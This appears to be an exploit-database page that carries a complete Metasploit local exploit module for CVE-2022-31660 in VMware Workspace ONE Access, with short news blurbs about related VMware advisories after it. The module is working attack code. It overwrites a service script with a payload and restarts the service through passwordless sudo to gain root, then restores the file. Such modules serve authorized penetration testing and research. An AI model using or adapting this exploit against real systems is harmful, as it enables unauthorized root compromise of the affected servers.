Headline
VMware Workspace ONE Access Privilege Escalation
VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control is permitted via the sudo configuration without a password.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Post::File include Msf::Post::Unix TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze def initialize(info = {}) super( update_info( info, { 'Name' => 'VMware Workspace ONE Access CVE-2022-31660', 'Description' => %q{ VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control is permitted via the sudo configuration without a password. }, 'License' => MSF_LICENSE, 'Author' => [ 'Spencer McIntyre' ], 'Platform' => [ 'linux', 'unix' ], 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], 'SessionTypes' => ['shell', 'meterpreter'], 'Targets' => [ [ 'Automatic', {} ], ], 'DefaultOptions' => { 'PrependFork' => true, 'MeterpreterTryToFork' => true }, 'Privileged' => true, 'DefaultTarget' => 0, 'References' => [ [ 'CVE', '2022-31660' ], [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ] ], 'DisclosureDate' => '2022-08-02', 'Notes' => { # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service # is disabled by default though. 'Stability' => [CRASH_SERVICE_DOWN], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK] } } ) ) end def certproxy_service # this script's location depends on the version, so find it. return @certproxy_service if @certproxy_service @certproxy_service = [ '/usr/local/horizon/scripts/certproxyService.sh', '/opt/vmware/certproxy/bin/certproxyService.sh' ].find { |path| file?(path) } vprint_status("Found service control script at: #{@certproxy_service}") if @certproxy_service @certproxy_service end def sudo(arguments) cmd_exec("sudo --non-interactive #{arguments}") end def check unless whoami == 'horizon' return CheckCode::Safe('Not running as the horizon user.') end token = Rex::Text.rand_text_alpha(10) unless sudo("--list '#{certproxy_service}' && echo #{token}").include?(token) return CheckCode::Safe('Cannot invoke the service control script with sudo.') end unless writable?(TARGET_FILE) return CheckCode::Safe('Cannot write to the service file.') end CheckCode::Appears end def exploit # backup the original permissions and contents print_status('Backing up the original file...') @backup = { stat: stat(TARGET_FILE), contents: read_file(TARGET_FILE) } if payload.arch.first == ARCH_CMD payload_data = "#!/bin/bash\n#{payload.encoded}" else payload_data = generate_payload_exe end upload_and_chmodx(TARGET_FILE, payload_data) print_status('Triggering the payload...') sudo("--background #{certproxy_service} restart") end def cleanup return unless @backup print_status('Restoring file contents...') file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it write_file(TARGET_FILE, @backup[:contents]) print_status('Restoring file permissions...') chmod(TARGET_FILE, @backup[:stat].mode & 0o777) endend
Related news
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution.
Vulnerability—for which a proof-of-concept is forthcoming—is one of a string of flaws the company fixed that could lead to an attack chain.
In a critical security advisory VMWare patches multiple RCE and EoP vulnerabilities in several affected products. The post Update now! VMWare patches critical vulnerabilities in several products appeared first on Malwarebytes Labs.
Categories: Exploits and vulnerabilities Tags: CVSS Tags: rce Tags: vmware In a critical security advisory VMWare patches multiple RCE and EoP vulnerabilities in several affected products. (Read more...) The post Update now! VMWare patches critical vulnerabilities in several products appeared first on Malwarebytes Labs.
Virtualization services provider VMware on Tuesday shipped updates to address 10 security flaws affecting multiple products that could be abused by unauthenticated attackers to perform malicious actions. The issues tracked from CVE-2022-31656 through CVE-2022-31665 (CVSS scores: 4.7 - 9.8) affect the VMware Workspace ONE Access, Workspace ONE Access Connector, Identity Manager, Identity Manager